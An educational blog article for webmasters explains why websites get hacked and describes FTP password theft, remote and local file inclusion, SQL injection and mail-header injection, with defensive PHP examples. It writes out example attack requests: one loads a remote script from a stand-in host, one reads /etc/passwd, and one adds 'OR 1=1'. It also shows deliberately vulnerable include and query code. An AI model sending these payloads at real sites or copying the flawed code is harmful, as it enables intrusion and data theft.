What is a website hack? Basic information to help webmasters block hackers.
http://25yearsofprogramming.com/blog/2008/20080311.htm
This provides background information for a set of articles that begins at:
* Website security: what to do after your site is hacked, and how to prevent it.
http://25yearsofprogramming.com/blog/20070705.htm
The files of your website are stored on a computer somewhere. The computer, called a "server" or "web server", is not much different from your home PC, except that its configuration is specialized for making files available to the World Wide Web, so it has a lot of hard drive capacity and a very high speed internet connection. It probably doesn't have its own monitor or keyboard because everyone who communicates with it does so through its internet connection, just like you do.
With everybody connecting to your site through the internet, it might seem like just an accident if one of your files gets changed once in a while in all the commotion, but it's not.
Your website and server have several security systems that determine what kind of access each person has. You are the owner, so you have passwords that give you read/write access to your site. You can view files (read) and you can also change them (write). Everybody else only has read access. They can view your files, but they are never, ever supposed to be able to change them, delete them, or add new ones.
A hack occurs when somebody gets through these security systems and obtains write access to your server, the same kind you have. Once they obtain that, they can change, add, or delete files however they want. If you can imagine someone breaking into your home and sitting down at your PC with a box of installation CDs, that's what a website hack is like. They might do only a little damage, or a lot. The choice is up to them.
People often ask, "But how could my page, which was 100% pure HTML, have been hacked?"
The answer is that the defacement of the page wasn't the hack. The hack was when they got write access to the server. The "pure HTML" page had nothing at all to do with that.
Altering the page was simply the thing they chose to do after they got in. Once they get in, they can do ANYTHING, including alter your pages that are pure HTML. That is the reason why, after a hack, the most important thing isn't repairing the damage they did (which most people focus on), but finding out how they got in.
Who are the hackers?
Website hacking is one of the modern enterprises of organized crime, but if you think that means it's being done amateurishly by a bunch of elderly mobsters who took night classes in Computer ABC's to learn what "this Internet Explore thing is", think again. These organizations have professional programmers. Their campaigns to take control of thousands of the world's computers are well planned and sophisticated, drawing on an in-depth knowledge of operating system software, browser vulnerabilities, programming, and even psychology, and their attacks are almost always automated.
Strangely enough, if your site was hacked, it probably wasn't done by a person, but by another computer, which was hacked by another computer, which was hacked by yet another. Somewhere way back in the chain is a programmer who unleashed the sequence of events that set all these computers to attacking each other and building a giant network, a "botnet". A botnet is a massively parallel virtual supercomputer whose purpose is to suck up all of the world's information that the criminals can efficiently turn into money. They need as many computers as possible recruited into the enterprise, and that's why they wanted to hack your little website.
Other hackers do it, whether they realize it or not, as affiliates of organized crime. Using tools provided by the larger organization, they get a small commission ($5, last I heard) for each website they successfully break into.
And there are still hackers who are motivated by fun, challenge, and prestige among their peers or by the desire to deface the site of someone they dislike, but their numbers and impact today are dwarfed by the commercial robotic crawling operations.
Why do they do it? What do they want?
What they want is money. While you may be racking your brain and tearing your hair out trying to figure out how to monetize your website, these people already know just how to do it, and they have a plan, too. You can't use the same monetization methods they do because all their methods are illegal!
To make money from your server, they want the following, listed in approximate order of decreasing value and decreasing frequency:
1. Your visitors' confidential financial information. One way or another, they want credit card, Social Security, and other information from the people who trustingly visit your site. Credit card numbers are sold in bulk to brokers who resell them. More complete financial information is used in identity theft schemes involving mortgages or car loans.
Theft methods:
* They install malicious content on your website so that your visitors are attacked with viruses, Trojans, keyloggers, and other spyware. Once on the PCs, the malware either searches for the data it wants, or keyloggers capture passwords as users log into their bank accounts. The stolen data is relayed to remote computers using the victim's internet connection. In spite of the availability of antivirus and antispyware software, many home PCs are still poorly protected, and one of the sophisticated attack packages (MPack) claims that it successfully infects 50% of the computers it attacks.
* They copy your customer database.
* They install spyware or phishing pages in your site, to grab data as your customers log in.
2. Use of your visitors' computers. When they got into your server, they took control of one computer, but now they can attack all your visitors, too, and maybe get hundreds or thousands of new zombie computers under their control. One of the things that makes your server an attractive target is the opportunity to attack all these poorly protected PCs.
3. Your mail server, for sending spam.
4. Your server's high-speed internet connection, for relaying stolen data, spamming, communicating with other sites in a botnet, crawling the web searching for new websites to victimize, and attacking them.
5. Free use of your server's processing power, which they can program to do whatever they want.
6. Free use of your webspace, to host illegal content or even an entire illegal website. They avoid webhosting fees and electricity bills, and they can engage in activities that no webhost would allow, leaving you with the worries about TOS violations and legal liability. Even after you clean up the site and remove the content, it may remain indexed by search engines for months.
Examples:
* Phishing sites: they create a fake (spoof) site that looks like a popular one such as PayPal. Then they send spam emails containing links to the phishing page on your site. When victims log in, thinking it's PayPal, your site steals their login data and relays it to a remote computer. Then the thieves log into the real PayPal accounts and steal the money.
* Illegal pornographic content.
* Storage for PHP or Perl scripts like c99 or r57, which they use in Remote File Inclusion (RFI) attacks on other sites. This makes your site look like the attacker.
7. Your traffic. They put visible links on your pages that visitors who trust your site are likely to follow. Or they install code to redirect all of your traffic to a different site. Either way, your visitors become their visitors.
8. Your money, by extortion, threatening to attack your site even worse if you don't pay them.
9. Your PageRank. By putting invisible outbound links on your pages (so only search engines see them) they inflate another site's inbound links and boost its PageRank. Appearing higher in search results makes more money for them.
10. Your advertising space. They monetize your popularity by inserting their ads onto your pages. Clicks are credited to them.
How do they do it?
They use whatever methods bring the most results, most efficiently, at any given time.
Almost all attacks are automated.
1) FTP password theft
In mid-2009, attacks known as "gumblar" and "martuz" made FTP password theft (not FTP password guessing) the most common way websites get modified without their owner's permission.
The attacks take advantage of the fact that many of the poorly protected PCs in the world happen to belong to webmasters, whose website login information is stored on their personal computers. Although the primary purpose of gumblar/martuz is financial gain (by maliciously modifying Google search results so clicks on the links get redirected to malware or phishing sites), gumblar and martuz also search the victim's PC for FTP login passwords and relay them to a remote computer. The remote computer logs into the website and modifies the pages to install new copies of gumblar/martuz so it can propagate itself.
Gumblar/martuz can be prevented with antivirus protection.
2) Remote File Inclusion attacks (RFI)
Before gumblar/martuz, RFI attacks were the top threat.
A remote file inclusion attack tricks an already-running website script into fetching a malicious script from an outside website. The imported code becomes part of the executing script, so it runs as part of it. It can perform any action that the scripting language (PHP, for example) allows, so it has almost unlimited ability to modify website files.
The reason RFI attacks are so widespread and so successful is that scripts vulnerable to RFI are everywhere. You could throw darts at random websites and hardly avoid hitting one with an RFI vulnerability, and that is essentially what most RFI attacks do: they throw millions of requests at millions of websites and gain entry to large numbers of them.
One reason there are so many RFI-vulnerable websites is that web applications such as blogs, forums, image galleries, content management systems (CMS), and shopping carts are often very complex, with thousands of lines of code. Some of that code dates from before RFI was a serious threat, and some was written by programmers who knew they should guard against RFI but forgot to program defensively. These applications are used by millions of websites, so a single RFI vulnerability turns many sites into good targets.
Another reason is that many sites contain PHP code written by novice programmers unaware of the dangers of RFI.
Here is a hypothetical example of an RFI attack in PHP.
What does PHP code vulnerable to RFI look like?
For a dynamically-generated web page, a programmer might use a template for the overall layout, but store individual articles in separate files so that basic elements of every page look the same, but the article content of each is different. One way to accomplish this is with a PHP "include". It opens a file, reads it, and inserts its contents at the location of the "include" line:
//Pull the requested article into the template page
include($_GET['ArticleID']);
The value of ArticleID determines which article will be displayed on the page. For simplicity, we will assume that articles are stored in numbered files with no extensions: 1, 2, 3, ...
The value of ArticleID is chosen by whoever requests the page. It travels in the "query string" portion of the HTTP request (the part after the question mark). To display article 1, you call this page with the following:
GET /Display.php?ArticleID=1
When Display.php starts running, $_GET['ArticleID'] automatically holds the value 1.
When that value is substituted into the code from above, it results in this:
include('1');
Since 1 is the name of the file containing article 1, that article is pulled into the page, and it works!
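To make the path from request to variable concrete, here is a minimal sketch of how that query string breaks down into a name and a value. It uses PHP's built-in parse_url() and parse_str() on the request from the example. This only approximates what PHP does internally when it fills $_GET, and is not a description of its actual implementation.

```php
<?php
// The request target from the example above.
$target = '/Display.php?ArticleID=1';

// Split off the query string (the part after the question mark).
$query = parse_url($target, PHP_URL_QUERY);

// Break the query string into name => value pairs, roughly as PHP
// does when it fills $_GET before the script starts running.
parse_str($query, $params);

// The value arrives as a string, and the script has no say in its content.
var_dump($params['ArticleID']);
```

The point to notice is that the script receives whatever text the requester put after the equals sign.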
The RFI vulnerability
There is a serious flaw in this code, however. ArticleID is never tested for being the name of an existing article, nor even for being a legal value. Let's see what happens when we do this:
GET /Display.php?ArticleID=http://remotesite.ru/r57.txt
When the value of ArticleID is substituted into the code from above, it results in this:
include('http://remotesite.ru/r57.txt');
Unless PHP is configured to prevent fetching URLs from remote servers, what this does is pull into the page, where an article should be, the r57.txt file from the distant website!
This is horrible. That remote file could be anything at all. In real attacks, it is usually a malicious PHP script. All of its code becomes part of the currently executing script (Display.php), and it runs. It can use every available function of PHP, and the amount of damage it can do is unlimited.
In practice, most attacks don't want to be noticed, so they do as little damage as possible. They install their malicious JavaScript, iframes, and viruses (which is bad enough), but leave everything else alone.
What does an RFI attack look like in my website access logs?
In your website access logs, a typical RFI attack looks like this:
GET /Display.php?ArticleID=http://remotesite.ru/r57.txt
Reading the request from left to right, its parts are:
* /Display.php: the name of the file being called. It might be the name of a page on your site, or not. These automated attacks use a shotgun approach. They will attack your site with known WordPress exploits without bothering to check whether you use WordPress or not.
* (Everything after the first question mark is called the query string. Its data will be passed to PHP or ASP.NET, or whatever you use.)
* ArticleID: the name of a variable. It might be the name of a variable your script actually uses, or not.
* http://remotesite.ru/r57.txt: the most important part, the remote file. It is the URL (web address) of a file on another website, which they want your script to fetch and execute.
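If you want to search your logs for requests of this shape, the check can be sketched as below. The function name looksLikeRfi is hypothetical, and the sketch assumes you have already extracted the request target (the part after GET) from each log line, since log formats vary by server.

```php
<?php
// Hypothetical helper: returns true when the query string of a request
// target contains a URL scheme such as http://, https://, or ftp://.
function looksLikeRfi(string $requestTarget): bool
{
    // Everything after the first question mark is the query string.
    $pos = strpos($requestTarget, '?');
    if ($pos === false) {
        return false; // no query string at all
    }
    $query = substr($requestTarget, $pos + 1);

    // Decode first so that encoded forms like http%3A%2F%2F are caught too.
    return preg_match('#(?:https?|ftp)://#i', rawurldecode($query)) === 1;
}

var_dump(looksLikeRfi('/Display.php?ArticleID=http://remotesite.ru/r57.txt'));
var_dump(looksLikeRfi('/Display.php?ArticleID=1'));
```

A check like this will also flag legitimate pages that take a web address as a parameter, so treat a match as something to review rather than proof of an attack.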
There are at least three ways to prevent RFI:
1. Change your code to act only on legitimate data of the type expected, and to do nothing when it receives a URL (web address) in place of legitimate data.
2. Set allow_url_fopen = Off in your PHP configuration. With this setting, PHP will not allow include() to retrieve files from remote servers, even if it encounters code that says it should do so. PHP 5.2 and later also have a separate allow_url_include setting, which is Off by default and blocks remote includes specifically.
3. Use .htaccess rules to block an HTTP request if it has a web address in the query string.
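The first of these methods might look something like the following for the Display.php example. This is a minimal sketch, not the only way to do it. The function name articlePath and the "articles" directory are assumptions made for illustration, and it relies on the earlier assumption that articles are stored in numbered files with no extensions.

```php
<?php
// Hypothetical helper: map a requested ArticleID to a file path, or
// return null when the value is not a plain article number.
function articlePath($rawId, string $articleDir): ?string
{
    // Accept only a short string of ASCII digits. A URL, a path, or an
    // array (from ArticleID[]=x) all fail this test.
    if (!is_string($rawId) || preg_match('/\A[0-9]{1,9}\z/', $rawId) !== 1) {
        return null;
    }
    $path = $articleDir . '/' . $rawId;

    // Only return the path if that article actually exists.
    return is_file($path) ? $path : null;
}

// Possible use in Display.php. The directory name is an assumption.
$path = articlePath($_GET['ArticleID'] ?? '', __DIR__ . '/articles');
if ($path !== null) {
    include $path;
} else {
    http_response_code(404); // do nothing with unexpected input
}
```

Because the value can only ever be digits, neither a web address nor a path with slashes or dots can reach include().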
3) Local File Inclusion attacks (LFI)
LFI attacks are almost the same as RFI, except they try to trick a web page into displaying the contents of your server's important system files that are normally inaccessible.
An LFI attack looks like this in your website access logs:
GET /Display.php?ArticleID=/../etc/passwd
* /Display.php: the name of the file being called.
* ArticleID: the name of a variable.
* /../etc/passwd: the relative path to a file on your server that they want to see on the output page.
When the value of ArticleID is substituted into the code from above, it results in this:
include('/../etc/passwd');
This pulls into the page, where an article should be, the contents of the server's account file. On older systems that file includes the password hashes, and once attackers have a hash, they can use high-speed offline techniques to crack it. Modern systems keep the hashes in a separate /etc/shadow file, but the list of account names is still useful to an attacker.
LFI attacks can also be blocked by good coding practices and .htaccess rules.
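One such coding practice, for scripts that cannot restrict the input to digits, is to resolve the requested path and confirm it is still inside the directory it is supposed to come from. The sketch below uses PHP's realpath() for this. The function name resolveInside is hypothetical.

```php
<?php
// Hypothetical helper: resolve a requested name inside a base directory
// and refuse anything that ends up outside it.
function resolveInside(string $baseDir, string $requested): ?string
{
    // Reject embedded null bytes before touching the filesystem.
    if (strpos($requested, "\0") !== false) {
        return null;
    }
    // realpath() collapses ".." segments and follows symlinks. It
    // returns false when the target does not exist.
    $base = realpath($baseDir);
    $full = realpath($baseDir . '/' . $requested);
    if ($base === false || $full === false) {
        return null;
    }
    // The resolved path must still begin with the base directory.
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($full, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return is_file($full) ? $full : null;
}
```

A request for ../../etc/passwd resolves to a path outside the base directory, so the function returns null and the script has nothing to include.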
4) SQL injection attacks
SQL injection attacks are similar to RFI and LFI (above), except they attack web pages that use Structured Query Language for querying and manipulating databases such as MySQL. The attacks embed SQL commands in the HTTP query string to try to trick the system into divulging secret information or inserting malicious data into the database.
Using familiar code from the previous examples, one type of SQL injection attack could look similar to this in your website access logs:
GET /Display.php?ArticleID=1 OR 1=1
The above line is simplified (a real request would URL-encode the spaces), and a full explanation of how it works differs too much from the previous examples to belong here, so this is only a brief overview:
The intended target isn't a PHP include() command as it was previously. Instead, the target is SQL query code.
For our example, we'll use a common situation where a web page contains a search box for the visitor to enter search terms. The script then uses those terms to find matching entries in a database, and it displays the results on the output page.
Assume that the PHP script is in our Display.php page, above, and it uses SQL to construct and perform the database search. There is a snippet of SQL code in the script for doing the search, but it is only partial. It lacks the specific search terms, which it expects to get later from the user.
After the user types the search terms and clicks the Submit button, the Display.php page receives its request. The user's search terms are in the HTTP query string. The script takes the search terms, combines them with the SQL code snippet it already had, searches the database, and outputs the result.
It is necessary for the script to carefully check what the user entered because it's being mixed into an existing SQL query. If the user entered only valid search terms, there's no problem, but if the user entered SQL code, it could become part of the query itself and transform it into a completely different one that does a lot more than just search the database for a few words.
In our simple example above, if the basic query was supposed to retrieve and display some user data for one user, the injection of the new partial SQL string "OR 1=1" causes it to display data for all users. This is because "1=1" is always true, so every record in the table is a match, and the output page will contain the data for every user.
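The transformation can be seen by printing the query text itself. In this sketch the table and column names (users, name, email, id) and the function name are invented for illustration, and the attacker is assumed to send the value 1 OR 1=1. Nothing here touches a real database.

```php
<?php
// Hypothetical vulnerable pattern: the request value is pasted straight
// into the SQL text with no checking at all.
function buildQueryUnsafe(string $articleId): string
{
    return 'SELECT name, email FROM users WHERE id = ' . $articleId;
}

// What the programmer expected to receive.
echo buildQueryUnsafe('1'), "\n";

// What the attacker sent. The WHERE clause is now true for every row.
echo buildQueryUnsafe('1 OR 1=1'), "\n";
```

The second query is valid SQL, so the database has no way to know that part of it came from a stranger.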
Another common SQL injection method uses code in the query string to build SQL data-altering commands. It visits every record in every database table and inserts malicious JavaScript or iframe code into all of them. Later, when the server fetches data from the database to put on a page, the malicious code is embedded in the data. A mass-attack called Asprox used this method.
The solution in our simple example is that if the page expects a query string like "ArticleID=1234", the code must perform its database action only if the incoming data consists entirely of numeric digits. If any other characters are present, it should quit and do nothing. Other prevention strategies are more complicated.
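A minimal sketch of that digits-only check follows, together with one of the other strategies, a parameterized query, which sends the data to the database separately from the SQL text. The function names and the articles table are assumptions, and fetchArticle() expects a PDO connection that you have already opened to your own database.

```php
<?php
// Hypothetical helper: accept the ID only if it consists entirely of
// digits. Anything else yields null, and the caller should do nothing.
function parseArticleId($raw): ?int
{
    if (!is_string($raw) || preg_match('/\A[0-9]{1,9}\z/', $raw) !== 1) {
        return null;
    }
    return (int) $raw;
}

// Hypothetical helper: look up one article with a parameterized query.
// The "?" placeholder is filled in by the database driver, so the value
// is never parsed as part of the SQL text.
function fetchArticle(PDO $db, int $id): ?array
{
    $stmt = $db->prepare('SELECT title, body FROM articles WHERE id = ?');
    $stmt->execute([$id]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}
```

With both in place, a request for ArticleID=1 OR 1=1 is rejected by parseArticleId() before any database code runs.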
5) Password attacks
Besides gumblar, there are other ways attackers can get a site's password:
* Eavesdrop on unencrypted FTP sessions passing through a home wireless network or public hot spot.
* Repeatedly try to log in with different userID/password combinations, hoping to guess the correct one.
* Steal user account login data from a webhosting company.
Failed attempts might or might not show in the site's FTP logs. Successful break-ins look the same as the activity of an authorized user, except the IP address is an unknown one.
6) Form mail spamming
Contact forms on web pages are sometimes hijacked to send spam. A compromise of this type is not really a hack because it doesn't give read/write access to an unauthorized user, but it does trick the site into doing something it shouldn't.
Emails are surprisingly simple, and are plain text. Each address header such as To and From is terminated by a CRLF (carriage return, line feed) sequence. It is therefore easy for someone filling out a contact form to insert text that creates an entire list of recipients (instead of just one) or that inserts additional headers such as BCC, unless the script that processes the contact form is written to prohibit these injections.
It is not actually the form (on the web page) that is vulnerable to attack. When a user completes and submits the form, the data is sent to a script on the website, called a forms handler, that processes the data and sends the email. It is that script that is vulnerable.
Once the spammers find a vulnerable script, they don't bother filling out the form manually. They write a program that submits data directly to the site's form mail processing script, over and over again, turning the site into a spammer.
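A forms handler can prohibit these injections by refusing any header value that contains a line break, and by accepting only a single valid address where one is expected. The following is a minimal sketch of that idea. The function names are hypothetical, and a real handler would apply the checks to every form field that ends up in a mail header.

```php
<?php
// Hypothetical helper: return a value that is safe to place in a single
// mail header, or null if it contains a line break.
function cleanHeaderValue(string $value): ?string
{
    // A CR or LF would end the current header and start a new one.
    if (preg_match('/[\r\n]/', $value) === 1) {
        return null;
    }
    return trim($value);
}

// Hypothetical helper: accept exactly one syntactically valid address.
function cleanEmail(string $value): ?string
{
    $value = cleanHeaderValue($value);
    if ($value === null || filter_var($value, FILTER_VALIDATE_EMAIL) === false) {
        return null;
    }
    return $value;
}
```

If either function returns null, the handler should send nothing at all rather than try to repair the input.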